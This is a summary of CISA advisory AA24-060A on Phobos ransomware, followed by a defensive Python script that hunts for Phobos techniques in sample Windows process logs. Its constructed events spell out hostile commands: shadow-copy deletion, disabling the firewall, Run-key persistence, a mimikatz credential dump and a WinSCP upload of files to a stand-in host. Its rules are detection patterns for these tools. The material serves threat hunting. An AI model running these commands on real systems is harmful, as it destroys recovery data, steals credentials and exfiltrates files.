#StopRansomware: Phobos Ransomware (CISA AA24-060A)
The FBI, CISA, and MS-ISAC have jointly released a Cybersecurity Advisory sharing information on Phobos ransomware variants observed as recently as February 2024. Phobos operates under a ransomware-as-a-service (RaaS) model and is likely connected to several variants, including Elking, Eight, Devos, Backmydata, and Faust ransomware. Phobos actors rely on off-the-shelf tooling such as Smokeloader, Cobalt Strike, and Bloodhound.

Phobos actors gain initial access through phishing campaigns or by exploiting exposed, vulnerable Remote Desktop Protocol (RDP) services. Once inside, they deploy hidden payloads, modify firewall configurations, and establish persistence through Windows Startup folders and Run registry keys. They use tools such as Mimikatz and NirSoft utilities for credential enumeration, and WinSCP and Mega.io for file exfiltration. Before encrypting, Phobos deletes volume shadow copies; it then encrypts user files and all connected logical drives. Each Phobos executable carries unique identifiers and an embedded ransom note.
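The behaviours summarized above (shadow-copy deletion, firewall tampering, Run-key persistence, credential-dumping and exfiltration tooling) are the things a defender can hunt for in process-creation telemetry. The following is an added example written for this page, not code from the advisory or from CISA: a small rule set run over constructed sample events. The event field names (`host`, `user`, `image`, `cmdline`) and the command lines themselves are assumptions modelled on Sysmon Event ID 1 / Security 4688 exports, not real logs.

```python
"""Hunt for Phobos-style TTPs in Windows process-creation telemetry.

Added example, not part of the CISA advisory. Events and field names are
constructed assumptions resembling flattened Sysmon EID 1 / Security 4688 data.
"""
import re
from collections import defaultdict

# Constructed sample telemetry (not real logs). WS01 shows the chained pattern
# the advisory describes; the other hosts carry benign or isolated activity.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": r"netsh advfirewall set currentprofile state off"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost "
                r"/t REG_SZ /d C:\Users\jdoe\AppData\Local\Temp\svchost.exe /f"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\winscp.exe",
     "cmdline": r'winscp.exe /command "open sftp://user@203.0.113.10" "put C:\Share\finance\*"'},
    {"host": "WS02", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin list shadows"},  # benign: listing, not deleting
    {"host": "FS01", "user": "CORP\\admin", "image": r"C:\Tools\mimikatz.exe",
     "cmdline": r'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "WS03", "user": "CORP\\asmith",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\asmith\Downloads\invoice.docx"'},
]

# Rule set derived from the TTPs named on this page (regex patterns are assumptions).
RULES = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "firewall_tampering": re.compile(
        r"netsh(?:\.exe)?\s+(?:advfirewall|firewall)\s+set\b.*\b(?:state\s+off|opmode\s+mode=disable)", re.I),
    "run_key_persistence": re.compile(
        r"reg(?:\.exe)?\s+add\s+.*\\CurrentVersion\\Run(?:Once)?\b", re.I),
    "startup_folder_drop": re.compile(
        r"\\Start Menu\\Programs\\Startup(?:\\|$)", re.I),
    "credential_dumping_tool": re.compile(r"mimikatz|nirsoft|passview", re.I),
    "exfil_tool": re.compile(r"winscp|mega(?:sync|cmd)?\.exe|mega\.(?:io|nz)", re.I),
}


def match_event(event):
    """Return the names of every rule that matches the event's image or command line."""
    haystack = f"{event['image']} {event['cmdline']}"
    return [name for name, rx in RULES.items() if rx.search(haystack)]


def scan(events):
    """Return one finding per (event, rule) pair, in log order."""
    findings = []
    for idx, ev in enumerate(events):
        for rule in match_event(ev):
            findings.append({"index": idx, "host": ev["host"], "user": ev["user"], "rule": rule})
    return findings


def suspicious_hosts(events, min_distinct_rules=2):
    """Hosts on which at least `min_distinct_rules` different TTPs fired.

    A single rule can be benign in isolation (an admin touching the firewall,
    a sanctioned WinSCP transfer), so triage keys on the chained behaviour:
    firewall tampering plus persistence plus shadow-copy deletion on one host
    is the Phobos pattern, not noise.
    """
    per_host = defaultdict(set)
    for f in scan(events):
        per_host[f["host"]].add(f["rule"])
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_distinct_rules}


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f['index']:>2}  {f['host']:<5} {f['user']:<16} {f['rule']}")
    print("hosts needing triage:", suspicious_hosts(SAMPLE_EVENTS))
```

The per-host threshold is the point of the example: individual indicators such as `vssadmin list shadows` or a lone WinSCP launch are common on healthy networks, while two or more of the advisory's TTPs on the same host within a short window is rarely anything but an intrusion. In production you would add a time window and feed the findings to a SIEM rather than printing them.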